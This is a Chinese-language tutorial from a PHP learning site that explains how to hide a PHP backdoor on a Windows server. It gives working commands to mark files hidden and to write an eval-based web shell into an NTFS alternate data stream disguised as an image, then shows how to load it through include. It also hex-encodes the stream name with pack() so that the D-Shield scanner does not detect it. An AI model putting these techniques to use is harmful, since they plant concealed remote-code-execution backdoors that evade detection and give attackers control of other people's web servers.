登录  /  注册

php如何将后门隐藏?

coldplay.xixi
发布: 2020-07-24 11:26:13
原创
3165人浏览过

php将后门隐藏的方法:首先创建系统隐藏文件,并创建ads隐藏文件;然后通过包含文件的方式来使用jpd;最后将【index.php:shell.jpg】hex编码即可。

php如何将后门隐藏?

php将后门隐藏的方法:

一. attrib +s +h

创建系统隐藏文件。

attrib +s +a +r +h  /  attrib +s +h文件名

b1aebdedde912b41f0d8ca7964b049b.png

 

查看隐藏文件

2addba4fbb5346bd26ce2b6b603d1f8.png

 

二. 利用ADS隐藏文件

  NTFS交换数据流(Alternate Data Streams,简称ADS)是NTFS磁盘格式的一个特性,在NTFS文件系统下,每个文件都可以存在多个数据流。通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用ADS数据流,我们可以做很多有趣的事情。(抄的)

 

1.首先创建ADS隐藏文件

在命令行,echo一个数据流进去,比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg
登录后复制

这样就生成了一个不可见的 index.php:shell.jpg

33d4b699293adf5931a7bb9505d764e.png

可用 dir/r命令来查看

b2a92eba403bb00027db3a9bcd2d910.png

修改与删除

修改:

进入文件所在目录,notepad index.php:shell.jpg

162a72bd89b2e58fe84c81464b15f35.png

如何删除index.php:shell.jpg呢?

直接删除index.php

1b58fa219e40a928e8d9d56b48890cf.png

2. 文件包含

我们生成了index.php:shell.jpg,可以通过包含文件的方式来使用。

<?php include(‘index.php:shell.jpg‘)?>
登录后复制

技术分享图片

def67ac4320de3e0236de3451f4b191.png

还可以用上面学的隐藏include.php

afab67c2bb33c793aeaf9e87df09f83.png

3. 免杀

隐藏了也不行兄dei,D盾一扫瞬间爆炸。

45d8bb0d5e5635fb3d0f07b45addbbd.png

把index.php:shell.jpg hex编码

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>
登录后复制

def67ac4320de3e0236de3451f4b191.png

相关学习推荐:PHP编程从入门到精通

以上就是php如何将后门隐藏?的详细内容,更多请关注php中文网其它相关文章!

智能AI问答
PHP中文网智能助手能迅速回答你的编程问题,提供实时的代码和解决方案,帮助你解决各种难题。不仅如此,它还能提供编程资源和学习指导,帮助你快速提升编程技能。无论你是初学者还是专业人士,AI智能助手都能成为你的可靠助手,助力你在编程领域取得更大的成就。
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习
PHP中文网抖音号
发现有趣的

Copyright 2014-2024 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号